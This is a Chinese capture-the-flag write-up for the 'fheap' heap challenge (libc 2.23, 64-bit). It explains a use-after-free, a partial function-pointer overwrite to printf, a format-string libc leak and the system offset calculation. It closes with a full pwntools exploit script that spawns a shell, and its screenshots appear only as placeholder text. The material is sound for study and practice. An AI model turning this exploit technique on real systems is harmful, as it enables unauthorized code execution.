CTF-PWN-堆-【use after free-2】

文章目录

- fheap libc 2.23 64位
- - 检查
  - main
  - create
  - delete
- 思路
- 覆盖目标函数的指针
- printf内部
- 调用覆盖的函数前
- 调用 printf时的栈
- 实际去的函数的地方
- 查找当前版本对应的libc_start_main和system
- 计算出system的libc基地址
- exp

fheap libc 2.23 64位

检查

在这里插入图片描述

main

多层while，其实和选择也差不多
在这里插入图片描述

create

分配0x20的堆，指针赋值给ptr
首先输入size大小
然后输入到buf当中
再看实际的buf的有多少，如果大于15就用malloc分配实际长度的堆，其指针为dest，然后将buf的内容复制进去，同时更新ptr里的内容，前八个字节为dest的值然后初始地址过24个字节开始被赋值函数的地址，此时对应的函数free两次，先free存储内容的指针，再free原ptr指针
如果小于15，就直接将buf的内容赋值到ptr的开始部分，然后初始地址过24个字节开始被赋值函数的地址，此时对应的函数free一次
最后将遍历unk_2020c0数组，每个数组元素16个字节，前八个字节赋值为1，后八个字节赋值为ptr
在这里插入图片描述

delete

先根据索引检查unk_2020c0后24个字节是否为值，有值则存在这个string，然后输入yes后调用ptr中的free函数，参数为ptr，最后将此时索引的unk_2020c0前八个字节设置为0 在这里插入图片描述

思路

依然存在use after free漏洞，可以使得create时能得到可以修改原来存储string相关信息的堆中的存储函数指针的内容

首先create两次，此时只有两个堆，都是0x20，且都存储string的相关信息（delete时的调用的函数指针），然后申请一个大小0x20的string，此时可利用格式化字符串泄露某个函数的地址，然后得到libc基地址，然后再得到system的地址
然后delete该申请的string 再次create此时可以重写之前一开始id为1的堆块内容中的函数指针,此时为system的函数地址，并且刚该开始的堆内容为/bin/sh，此时再次delete（1）即可成功getshell

覆盖目标函数的指针

选用printf函数指针
函数装入内存时，由于地址随机化不会影响到低12位的值，此时可能可以成功覆盖到目的函数
在这里插入图片描述

在这里插入图片描述

printf内部

test指令（按位与）检查如果不是零就会执行movaps

movaps指令处理的内存位置必须是十六字节对齐的

如果不是零，就没有跳转，那么会执行movaps，满足十六字节对齐比较麻烦
所以我们先通过执行前面的存在的赋值ax为零的指令即可
在这里插入图片描述

调用覆盖的函数前

在这里插入图片描述

EAX与AX不是独立的，EAX是32位的寄存器，而AX是EAX的低16位。
举例来说
mov eax, 12345678h
那么AX将会是eax的低16位，也就是5678h。
而如果此时
mov ax，3344h
那么eax的值将变为12343344h，所以对ax的赋值是会影响eax的。
同样，AH是ax的高8位，而AL是ax的低8位，这就是说ah为33h，al为44h。

跳转后先执行mov eax,0
在这里插入图片描述

调用 printf时的栈

在这里插入图片描述
栈的第172个是libc_start_main+240

在这里插入图片描述

实际去的函数的地方

所以此时还需输入，此时想直接跳过这个地方输入只要输入一次-1就好了
在这里插入图片描述

查找当前版本对应的libc_start_main和system

在这里插入图片描述

计算出system的libc基地址

在这里插入图片描述

exp

from pwn import *
context(os="linux",arch="amd64",log_level="debug")
s=process("./pwn-f")
libc=ELF("./libc-2.23.so")
f=ELF("./pwn-f")
# gdb.attach(s,"b main")

def create(size,string):
    s.sendlineafter(b"3.quit\n",b"create ")
    s.sendlineafter(b"Pls give string size:",str(size))
    s.sendafter(b"str:",string)# 注意此时不能用sendlineafter，内容中会在后面有一个换行府，在覆盖函数底地址会多覆盖一个字节

def delete(id):
    s.sendlineafter(b"3.quit\n",b"delete ")
    s.sendlineafter(b"id:",str(id))
    s.sendlineafter(b"Are you sure?:",b"yes")


create(8, "ab") 
create(8, "ab") 

delete(1)
delete(0)

create(0x20, b'_libc_s_m+240:%176$pend'.ljust(0x18, b'c') + p8(0xB6))  # 0

delete(1)

s.recvuntil(b"_libc_s_m+240:")
libc_start_main_240= s.recvuntil("end", drop=True) # False是包括end

print(type(libc_start_main_240))
libc_start_main_240=int(libc_start_main_240,16) # 0x 形式的字节的转化为16进制数

system_addr = libc_start_main_240-240-0x20750+0x453a0

print("__libc_start_main_240: " + hex(libc_start_main_240))
print("system address: " + hex(system_addr))

s.sendline("-1")
delete(0)

create(0x20, b"/bin/sh;".ljust(24, b"p") + p64(system_addr))

delete(1)

s.interactive()